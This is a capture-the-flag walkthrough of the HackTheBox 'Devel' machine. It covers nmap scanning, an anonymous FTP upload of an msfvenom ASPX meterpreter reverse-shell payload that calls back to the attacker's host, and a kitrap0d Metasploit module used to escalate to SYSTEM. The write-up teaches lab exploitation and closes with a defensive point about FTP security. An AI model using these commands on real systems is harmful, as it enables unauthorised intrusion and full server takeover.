HackTheBox – Devel

By doing a quick nmap scan we can see that port 21 (FTP) and port 80 (HTTP) are open.

nmap 10.10.10.5

Let’s do a slightly more advanced nmap scan to determine the service versions (-sV) and run the default nmap scripts (-sC).

nmap -sC -sV 10.10.10.5

It looks like anonymous FTP is allowed so let’s start there.

ftp 10.10.10.5

We are able to log in to the FTP server as the anonymous user. Now it is possible to upload files to the server.

MSFvenom

MSFvenom is used to create payloads that can be deployed on a remote server. We should be able to create a payload and upload it to the web server through the FTP session. Once it runs, a reverse shell should connect back to the Metasploit listener we will set up.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4545 -f aspx -o cesar.aspx

Now we take cesar.aspx and upload it to the web server through FTP.

put cesar.aspx

Now we need to prepare our Metasploit console to listen for a connection from cesar.aspx. We will be using a reverse_tcp listener.

We can now run our exploit with the option -j as a background job.

Now we trigger our payload on the server by browsing to http://10.10.10.5/cesar.aspx

On the msf console, we will see the following:

We can list the sessions and interact with the new Meterpreter session.

Now we have successfully gained control of the victim’s machine and we are ready to escalate our privileges.

Privilege Escalation

We do not have SYSTEM-level access yet. For that, we need to do further work.

There is a post-exploitation module, the local exploit suggester, that we can run to get a list of potential exploits that may work on this system.

use post/multi/recon/local_exploit_suggester

Let’s use kitrap0d.

use exploit/windows/local/ms10_015_kitrap0d

We have successfully obtained SYSTEM-level access.

This virtual machine shows how important it is for administrators to secure their FTP connections. If a hacker is able to log in through FTP and upload files to the web server, they will be able to gain system-level control over the server.
